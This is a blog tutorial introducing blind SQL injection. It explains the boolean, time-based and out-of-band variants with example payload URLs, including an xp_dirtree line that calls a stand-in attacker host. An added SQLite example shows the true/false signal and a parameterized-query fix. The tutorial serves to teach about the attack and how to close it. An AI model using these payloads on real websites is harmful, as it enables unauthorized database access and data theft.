Blind SQL Injection: Introduction


SQL injection is one of the deadliest attacks on the Internet. It tops the OWASP Top 10. I have already written about the basic SQL Injection attack. If you haven't seen those articles, here are the links:

http://www.anonhack.in/2015/09/sql-injection-part-1/

http://www.anonhack.in/2016/01/sql-injection-the-guide/

http://www.anonhack.in/2017/06/sql-injection-part-3-identifying-string-or-numeric/

http://www.anonhack.in/2018/04/sql-injection-part-4getting-admin-password/

The links above are guides to Error based Reflective SQL Injection and to identifying the column that reflects values.

This article is all about Blind SQL Injection.

Let’s jot down some key points before we start:

Blind SQL Injection is very much a guessing game.

It is time-consuming compared to Error based SQL Injection.

In Blind SQL Injection, the result of the attack shows up as the page loading improperly, or via another channel.

You never see the table contents in the output of the query as you do in Error based SQLi, because Blind SQLi works only with True or False.

Types of Blind SQL Injection:

  1. Boolean based Blind SQLi
    Boolean based Blind SQLi works like a boolean: yes or no, True or False. The content of a particular field on the website loads correctly if the condition you put in the query holds in the database; otherwise it does not load.
    Example:
    www.example.com/site.php?id=2  --> This will load the page for id=2 correctly.
    www.example.com/site.php?id=2' AND 1=1# --> This query should load the page for id=2 correctly because 1=1 is always true.
    www.example.com/site.php?id=2' AND 1=2# --> This query would not load the id=2 page because 1=2 is false.
    There is more than one way to write the above query. Sometimes ' AND 1=1# works without the quote. You should always try different ways.


     

  2. Time Based SQL Injection
    This is a time based interaction with the website. If the website takes time to respond when you put in a query, then the site is vulnerable to Time based SQLi. A sleep function is used to carry out Time based SQLi: you put the sleep function in the query and set the delay, and if the website takes that long to load, you can carry out Time based SQLi on that website.
    There is a time delay with Blind SQLi.
    Time based SQLi is used when the Boolean way doesn't work: when you put in a Boolean based query and see no change reflected on the page, such as a missing picture or content that hasn't loaded the way it should, you go for Time based SQLi.
    Example: www.example.com/site.php?id=1; waitfor delay '0:0:5'--       --> This is an MS SQL query.
    or
    www.example.com/site.php?id=1 and if(1=1, sleep(10), false) --


     

  3.  Out of band Blind SQLi
    In this type of attack the channel is out of band: the results do not appear on the victim website but in the attacker's logs. Quite confusing, but the channel here is out of band, i.e. the attacker's own server.
    Example: www.example.com/site.php?id=1;EXEC master..xp_dirtree '\\notvictim.attacker.com\'
    The above query will execute on the victim's website, but it will produce an output on the server notvictim.attacker.com.
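
The True/False behaviour described under Boolean based Blind SQLi can be reproduced locally, and the same check shows when it has been closed off. This is an added example, not code from the original article: it uses Python's sqlite3 with a constructed in-memory table standing in for the database behind site.php, it uses the unquoted form of the AND 1=1 / AND 1=2 conditions, and all table and function names are hypothetical.

```python
import sqlite3


def make_db():
    # Constructed sample data; "pages" is a hypothetical table behind site.php.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages (id INTEGER, body TEXT)")
    db.executemany("INSERT INTO pages VALUES (?, ?)",
                   [(1, "home page"), (2, "about page")])
    return db


def load_page_vulnerable(db, page_id):
    # The raw id value is concatenated into the SQL text, so a trailing
    # "AND <condition>" becomes part of the WHERE clause.
    row = db.execute("SELECT body FROM pages WHERE id = " + page_id).fetchone()
    return row[0] if row else None


def load_page_parameterized(db, page_id):
    # The id value is bound as data; it can never change the query structure.
    row = db.execute("SELECT body FROM pages WHERE id = ?", (page_id,)).fetchone()
    return row[0] if row else None


def has_boolean_oracle(loader, db, base_id="2"):
    # A page that loads for a true condition and fails for a false one
    # is the yes/no signal that Blind SQLi depends on.
    on_true = loader(db, base_id + " AND 1=1")
    on_false = loader(db, base_id + " AND 1=2")
    return on_true is not None and on_false is None


if __name__ == "__main__":
    db = make_db()
    for loader in (load_page_vulnerable, load_page_parameterized):
        print(loader.__name__, "oracle present:", has_boolean_oracle(loader, db))
```

With the bound parameter, both conditions produce the same "not found" result, so the page no longer answers True or False to whatever is appended to id.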

 

I will provide an example for each form of Blind SQLi in the upcoming articles and put the links in this article to make them easier for you to find.

